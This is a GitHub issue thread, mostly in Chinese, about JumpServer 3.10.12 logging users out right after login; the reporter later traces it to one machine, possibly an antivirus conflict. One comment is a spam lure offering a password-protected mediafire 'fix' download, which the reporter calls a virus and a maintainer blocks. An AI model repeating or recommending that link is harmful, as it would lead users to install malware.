### ISSUE TITLE
[Bug] 新安装登陆后马上自动登出返回登录页

### ISSUE THREAD

**Issue by sd1114820** [jumpserver/jumpserver#14030]
### 产品版本

3.10.12

### 版本类型

- [X] 社区版
- [ ] 企业版
- [ ] 企业试用版

### 安装方式

- [ ] 在线安装 (一键命令安装)
- [X ] 离线包安装
- [ ] All-in-One
- [X] 1Panel
- [ ] Kubernetes
- [ ] 源码安装

### 环境信息

debian

### 🐛 缺陷描述

安装完成后，登陆WEB面板登陆成功会自动返回登陆面板，感觉是自动登出了。

### 复现步骤

安装完成后登陆

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sd1114820** [comment]
楼上是骗人的，有病毒，大家别信

**Comment by ibuler** [comment]
@sd1114820 我 block 掉了，不应该显示才对

**Comment by sd1114820** [comment]
已经找到问题，从这台电脑，无论火狐还是谷歌还是EDGE都不能登陆，可能是与卡巴或则什么有冲突。
从其他电脑登陆后绑定二次验证，再用这台电脑输入账号密码和二次验证后，用户名和密码都会提示该字段是必填项，应该是提交的时候未知原因丢失了

**Comment by BaiJiangJie** [comment]
刚使用，还是最近才出现？现在问题解决了吗？

**Comment by BaiJiangJie** [comment]
好的。
